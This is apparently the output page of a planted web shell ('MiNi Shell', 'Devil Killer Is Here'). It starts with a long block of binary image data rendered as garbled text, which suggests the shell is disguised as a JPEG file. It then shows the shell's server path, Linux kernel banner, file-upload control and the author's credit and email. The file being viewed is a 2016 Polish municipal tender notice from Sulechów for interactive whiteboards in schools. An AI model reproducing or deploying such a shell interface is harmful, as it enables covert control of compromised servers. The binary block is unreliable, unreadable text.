JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160406/78678-N-2016.html

<p class="kh_header"><b>Sulechów: Zakup tablic interaktywnych dla szkół w Gminie Sulechów</b><br>
<b>Numer ogłoszenia: 78678 - 2016; data zamieszczenia: 06.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup tablic interaktywnych dla szkół w Gminie Sulechów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i montaż przez Wykonawcę na rzecz Zamawiającego 25 (dwadzieścia pięć) takich samych zestawów składających się z tablicy interaktywnej, projektora i dwóch głośników, wraz z okablowaniem, oraz przeszkolenie pracowników jednostek oświatowych Zamawiającego.
2.	Przedmiot umowy (każdy z zestawów) musi spełniać następujące wymagania szczegółowe:
1)	Tablica interaktywna:
Technologia	pozycjonowanie w podczerwieni; nie dopuszcza się zastosowania przystawek ani innych technologii.
Obszar interaktywny [szer./wys. cm]	minimum 158,0 cm x 117,0 cm.
Przekątna wymiaru interaktywnego [cm]	co najmniej 197,0 cm.
Format 	4:3.
Powierzchnia tablicy	ceramiczna, magnetyczna, matowa, sucho ścieralna.
Wyposażenie	półka na pisaki, paski skrótów z nadrukowanymi klawiszami funkcyjnymi (łącznie min. 26) przywołującymi wybrane funkcje oprogramowania, oprogramowanie na płycie CD, kabel USB, 2 pisaki, naścienny zestaw montażowy.
Walory użytkowe	-	sterowanie co najmniej 6 aktywnymi punktami na interaktywnym obszarze tablicy, jednoczesne kreślenie co najmniej 6 interaktywnych linii,
	-	plug ang play - tablica po podłączeniu do komputera jest aktywna - nie ma konieczności instalowania sterowników,
	-	rozpoznawanie gestów (multi gesture),
	-	korelacja z głośnikami polegająca na tym, że komputer łączy się z tablicą i głośnikami poprzez jeden kabel USB.
Współpraca z systemem operacyjnym 	Windows XP/Vista/7/8/10.
Certyfikaty produktu	CE, FCC, ROHS.
Gwarancja 	co najmniej 5 lat na tablicę, co najmniej 1 rok na pozostałe komponenty, przy czym warunki gwarancji muszą:
-	umożliwiać Zamawiającemu wykonanie uprawień gwarancyjnych na terytorium Rzeczypospolitej Polskiej,
-	przewidywać przysługiwanie Zamawiającemu uprawnień z tytułu gwarancji bez potrzeby dokonywania odpłatnych przeglądów,
-	przewidywać nieodpłatne usuwanie przez gwaranta wad przedmiotu umowy, ujawnionych w okresie gwarancji.    
Oprogramowanie 	-	lektor tekstu - głosowe odczytywanie przez komputer tekstów pisanych w języku angielskim,
	-	narzędzia cyrkiel, kątomierz, linijka,
	-	przeprowadzanie głosowania (ankiety) - opcjonalnie przy wykorzystaniu pilotów do testów tego samego producenta,
	-	podgląd obrazu z kamery / wizualizera,
	-	kreator wykresów funkcji,
	-	biblioteka graficznych zasobów edukacyjnych 3D (obracanie i powiększanie obiektów),
	-	korelacja z wyszukiwarką internetową w zakresie wstawiania plików graficznych (obrazów) - funkcja dostępna w oknie programu,
	-	wstawianie do prezentacji wyszukanych online zasobów na zasadzie przeciągnij i upuść (drag & drop).
Wymagania dodatkowe	autoryzowany przez producenta (lub innego gwaranta) serwis gwarancyjny w Polsce ma posiadać certyfikat zarządzania jakością ISO 9001 w zakresie procedury serwisowej - dokument potwierdzający należy załączyć do oferty.
2)	Projektor:
Technologia	3 LCD 
Panel LCD 0,55 cala lub większy
Natężenie światła barwnego	min. 2.700 lumen (tryb ekonomiczny min. 1.600 lumen).
Natężenie światła białego	min. 2.700 lumen (tryb ekonomiczny min. 1.600 lumen) zgodne z normą ISO 21118:2012.
Rozdzielczość	min. XGA, 1024 x 768.
Format wyświetlanego obrazu (natywnej rozdzielczości)	4:3.
Kontrast	min. 15000:1.
Korekcja obrazu	pionowo: min. ? 15 °,  poziomo: min. ? 15 °.
Współczynnik projekcji	mieszczący się w zakresie 0,45:1 - 0,55:1.
Wbudowane głośniki	min. 15 W.
Złącza	-	USB min. 2.0 typu A, USB min. 2.0 typu B, RS-232C, interfejs Ethernet (100 Base-TX / 10 Base-T),
	-	wejście VGA, wyjście VGA, wejście HDMI, wejście sygnału kompozytowego, wejście sygnału komponentowego, wejście S-Video,
	-	stereofoniczne wyjście audio mini-jack, stereofoniczne wejście audio mini-jack (min. 2x), wejście mikrofonu, wejście audio typu cinch.
Gwarancja	-	projektor - co najmniej 36 miesięcy,
-	lampa - co najmniej 36 miesięcy lub co najmniej 1 000 h,
przy czym warunki gwarancji muszą:
-	umożliwiać Zamawiającemu wykonanie uprawień gwarancyjnych na terytorium Rzeczypospolitej Polskiej,
-	przewidywać przysługiwanie Zamawiającemu uprawnień z tytułu gwarancji bez potrzeby dokonywania odpłatnych przeglądów,
-	przewidywać nieodpłatne usuwanie przez gwaranta wad przedmiotu umowy, ujawnionych w okresie gwarancji.    
Dodatkowe wyposażenie	-	oryginalna dodatkowa lampa w zestawie (oryginalna lampa producenta projektora o żywotności min. 5000h tryb standardowy, 10 000h tryb eko),
	-	aluminiowy uchwyt ścienny (uchwyt do ściennego montażu projektora z wysięgnikiem o długości co najmniej 115 cm; możliwość regulacji pochylenia w osi uchwytu co najmniej o +/- 40°; możliwość regulacji pochylenia na boki co najmniej o +/- 40°; możliwość prowadzenia okablowania wewnątrz uchwytu).
3)	Głośniki (2 szt.):
Moc	min. 20W x 2 = 40W  RMS.
Gniazda w HUB:	-	mikro USB do podłączenia półki interaktywnej,
	-	USB do podłączenia tablicy,
	-	HDMI do podłączenia tablicy,
	-	USB do podłączenia zewnętrznego urządzenia,
	-	mikroUSB - wyjście na komputer,
	-	gniazdo słuchawkowe (minijack),
	-	gniazdo do podłączenia mikrofonu (minijack),
	-	gniazdo micro SD,
	-	zasilanie,
	-	min. 2 x cinch do podłączenia głośników.
Gwarancja	co najmniej 12 miesięcy, przy czym warunki gwarancji muszą:
-	umożliwiać Zamawiającemu wykonanie uprawień gwarancyjnych na terytorium Rzeczypospolitej Polskiej,
-	przewidywać przysługiwanie Zamawiającemu uprawnień z tytułu gwarancji bez potrzeby dokonywania odpłatnych przeglądów,
-	przewidywać nieodpłatne usuwanie przez gwaranta wad przedmiotu umowy, ujawnionych w okresie gwarancji.    
Walory użytkowe	Przyciski + i - do regulacji głośności, mocowanie bezpośrednio do ramy tablicy, korelacja z tablicą polegająca na tym, że komputer łączy się z tablicą i głośnikami poprzez jeden kabel USB.
3.	Z zastrzeżeniem ust. 4 poniżej, Wykonawca zobowiązuje się dostarczyć i zamontować zestawy, o których mowa w ust. 1 i 2 powyżej, w jednostkach oświatowych Gminy Sulechów, zgodnie z poniższą tabelą:
L.p.	Nazwa jednostki	Liczba zestawów
1	Szkoła Podstawowa nr 1 im. gen. Józefa Bema w Sulechowie, ul. 31-go Stycznia 23, 66-100 Sulechów	6
2	Zespół Szkół w Sulechowie, ul. Piaskowa 52, 66-100 Sulechów	10
3	Szkoła Podstawowa w Brodach, ul. Jagielnicka 97, 66-105 Pomorsko	1
4	Szkoła Podstawowa w Bukowie, Buków 53, 66-100 Sulechów	1
5	Szkoła Podstawowa im. L. Kruczkowskiego w Cigacicach, ul. Plac Szkolny 10, 66-131 Cigacice	1
6	Szkoła Podstawowa w Kalsku, Kalsk 65, 66-100 Sulechów	1
7	Szkoła Podstawowa w Kijach, Kije 141 A, 66-100 Sulechów	1
8	Gimnazjum nr 2 im. Jana Pawła II w Sulechowie, ul. 1-go Maja 7, 66-100 Sulechów	3
9	Gimnazjum w Pomorsku, ul. Bolesława Chrobrego 51, 66-105 Pomorsko	1
	Suma	25
4.	W przypadku zmian w sieci jednostek oświatowych Gminy Sulechów, o których mowa w ust. 3 powyżej, Zamawiający zastrzega sobie możliwość zmiany ilości zestawów montowanych w poszczególnych jednostkach, w tym dokonywanie przesunięć pomiędzy poszczególnymi jednostkami, przy czym ogólna ilość zamawianych i montowanych zestawów nie ulegnie zmianie. W przypadku, o którym mowa powyżej, Zamawiający poinformuje Wykonawcę na piśmie o zmianie ilości lub miejsc montażu poszczególnych zestawów. Decyzja Zamawiającego w tym względzie jest wiążąca dla Wykonawcy i z tego tytułu nie przysługują mu dodatkowe roszczenia.
5.	Wykonawca zobowiązuje się, na swój koszt, w odniesieniu do każdego z 25 zamówionych zestawów: 
1)	dokonać montażu zestawu składającego się z tablicy interaktywnej, projektora i głośników w klasach i pomieszczeniach wskazanych przez dyrektorów jednostek oświatowych poprzez:
-	montaż tablicy interaktywnej na ścianie,
-	montaż głośników wraz z hub przy tablicy,
-	montaż projektora na ścianie,
-	podłączenie tablicy, głośników i projektora do komputera w danym pomieszczeniu,
2)	zapewnić okablowanie i inne niezbędne materiały wymagane do właściwego montażu na ścianie i podłączenia zestawu do komputera; Kable i przewody pomiędzy poszczególnymi elementami zestawu i komputerem muszą być zakryte w listwach maskujących/korytkach,
3)	dokonać kalibracji zestawu (tablica, głośniki i projektor),
4)	zainstalować na komputerze oprogramowanie niezbędne do korzystania z zestawu i pełnego wykorzystania jego funkcji, 
5)	dokonać podłączenia zestawu (tablica, głośniki i projektor) do komputera i sprawdzenia poprawności działania z komputerem i oprogramowaniem,
6)	zapewnić wszelkie materiały i sprzęt, niezbędne do uruchomienia i zapewnienia działania 25 zamówionych zestawów.
6.	Wykonawca zobowiązuje się przeprowadzić, na swój koszt, szkolenia pracowników jednostek oświatowych wymienionych w ust. 3 powyżej, w których zainstalowane zostaną zamówione zestawy. Szkolenia pracowników przeprowadzone zostaną w każdej z jednostek. Przedmiotem szkoleń będzie każdorazowo uruchamianie i eksploatacja urządzeń, o których mowa w ust. 2 powyżej. Szkolenia przeprowadzone będą w każdej z jednostek oświatowych z wykorzystaniem zamontowanego w niej zestawu lub zestawów. W szkoleniu będzie mogła uczestniczyć każdorazowo nieograniczona liczba pracowników danej jednostki. O liczbie osób do przeszkolenia decyduje dyrektor danej jednostki. Szkolenie ma trwać będzie każdorazowo co najmniej 120 minut.
7.	Dopuszcza się składanie ofert równoważnych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.65.21.00-1, 32.34.24.12-3, 30.19.59.00-1, 30.19.58.00-0, 51.31.00.00-8, 79.63.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 3 000,00 zł (słownie: trzy tysiące złotych).</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty na załączniku nr 1.
2.	Dane Wykonawcy na załączniku nr 2.
3.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
4.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a)	zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonawców,
b)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - wydłużenie okresu gwarancji na montaż max. o 12 miesięcy ponad 12 miesiące - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza dokonanie zmian w umowie dotyczących:
1)	nazwy zadania, numerów kont bankowych oraz działów, rozdziałów i paragrafów klasyfikacji budżetowej,
2)	przedstawicieli stron.
3)	możliwość zmiany ilości montowanych zestawów tablic interaktywnych pomiędzy placówkami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Sulechów Plac Ratuszowy 6, 66-100 Sulechów pok nr 119b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2016 godzina 10:30, miejsce: Gmina Sulechów Plac Ratuszowy 6, 66-100 Sulechów pok nr 002 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com